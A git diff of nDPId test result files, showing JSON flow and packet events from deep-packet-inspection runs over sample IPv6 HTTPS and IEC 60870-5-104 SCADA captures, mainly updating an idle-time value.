+00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1448269139219,"flow_last_seen":1448269139339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 
+00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1448269144450,"flow_last_seen":1448269144884,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":13365,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00622{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00629{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1448269127960,"flow_last_seen":1448269128028,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::5f","src_port":55145,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1448269127960,"flow_last_seen":1448269128028,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::5f","src_port":55145,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269144306,"flow_last_seen":1448269144348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00609{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269144306,"flow_last_seen":1448269144348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269145458,"flow_last_seen":1448269145478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269145458,"flow_last_seen":1448269145478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269144306,"flow_last_seen":1448269144348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00609{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269144306,"flow_last_seen":1448269144348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269145458,"flow_last_seen":1448269145478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269145458,"flow_last_seen":1448269145478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","packets-captured":193,"packets-processed":193,"total-skipped-flows":0,"total-l4-data-len":51193,"total-not-detected-flows":1,"total-guessed-flows":7,"total-detected-flows":7,"total-detection-updates":11,"total-updates":0,"current-active-flows":0,"total-active-flows":15,"total-idle-flows":15,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":98,"global_ts_msec":1448269146970} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 193/193 diff --git a/test/results/iec60780-5-104.pcap.out b/test/results/iec60780-5-104.pcap.out index 56f3cec68..f7133639f 100644 --- a/test/results/iec60780-5-104.pcap.out +++ b/test/results/iec60780-5-104.pcap.out 
@@ -1,42 +1,42 @@ 00465{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"iec60780-5-104.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1219992231267} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992231267,"flow_last_seen":1219992231267,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992231267,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1219992231267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAwbS5AAIAGRKWsG\/htrBv4TwYgCWR6t61JAAAAAHAC\/\/8CpgAAAgQFtAEBBAI="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1219992231267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992231267,"pkt":"ABNy14eKABXFGNTMCABFAAAwQVVAAIAGcH6sG\/hPrBv4bQlkBiDrZdPBeretSnAS\/\/9DbQAAAgQFtAEBBAI="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1219992231267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAobS9AAIAGRKysG\/htrBv4TwYgCWR6t61K62XTwlAQ\/\/9wMQAAAAAAAAAA"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992231267,"flow_last_seen":1219992231283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992231283,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992393215,"flow_last_seen":1219992393215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992393215,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1219992393215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992393215,"pkt":"ABXFGNTMABNy14eKCABFAAAwbYNAAIAGRFCsG\/htrBv4TwYiCWRtLtqlAAAAAHAC\/\/\/i0AAAAgQFtAEBBAI="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1219992393215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992393215,"pkt":"ABNy14eKABXFGNTMCABFAAAwQXdAAIAGcFysG\/hPrBv4bQlkBiJI3nuobS7apnAS\/\/8eOQAAAgQFtAEBBAI="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1219992393216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992393216,"pkt":"ABXFGNTMABNy14eKCABFAAAobYRAAIAGRFesG\/htrBv4TwYiCWRtLtqmSN57qVAQ\/\/9K\/QAAAAAAAAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992393215,"flow_last_seen":1219992393217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992393217,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992486295,"flow_last_seen":1219992486295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992486295,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1219992486295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992486295,"pkt":"ABXFGNTMABNy14eKCABFAAAwbaNAAIAGRDCsG\/htrBv4TwYjCWQlpaXOAAAAAHAC\/\/9fMAAAAgQFtAEBBAI="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1219992486296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992486296,"pkt":"ABNy14eKABXFGNTMCABFAAAwQX5AAIAGcFWsG\/hPrBv4bQlkBiP13h8HJaWlz3AS\/\/9KOQAAAgQFtAEBBAI="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1219992486296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992486296,"pkt":"ABXFGNTMABNy14eKCABFAAAobaRAAIAGRDesG\/htrBv4TwYjCWQlpaXP9d4fCFAQ\/\/92\/QAAAAAAAAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992486295,"flow_last_seen":1219992486297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992486297,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1219992231267,"flow_last_seen":1219992392222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992546983,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992590188,"flow_last_seen":1219992590188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992590188,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1219992590188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAwbcVAAIAGRA6sG\/htrBv4TwYkCWQxVG2fAAAAAHAC\/\/+LrwAAAgQFtAEBBAI="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1219992590188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992590188,"pkt":"ABNy14eKABXFGNTMCABFAAAwQYVAAIAGcE6sG\/hPrBv4bQlkBiSd+ybXMVRtoHAS\/\/\/GywAAAgQFtAEBBAI="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1219992590188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAobcZAAIAGRBWsG\/htrBv4TwYkCWQxVG2gnfsm2FAQ\/\/\/zjwAAAAAAAAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992590188,"flow_last_seen":1219992590189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992590189,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 
-00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":73,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1219992393215,"flow_last_seen":1219992485282,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992650548,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":80,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1219992486295,"flow_last_seen":1219992589197,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992710502,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 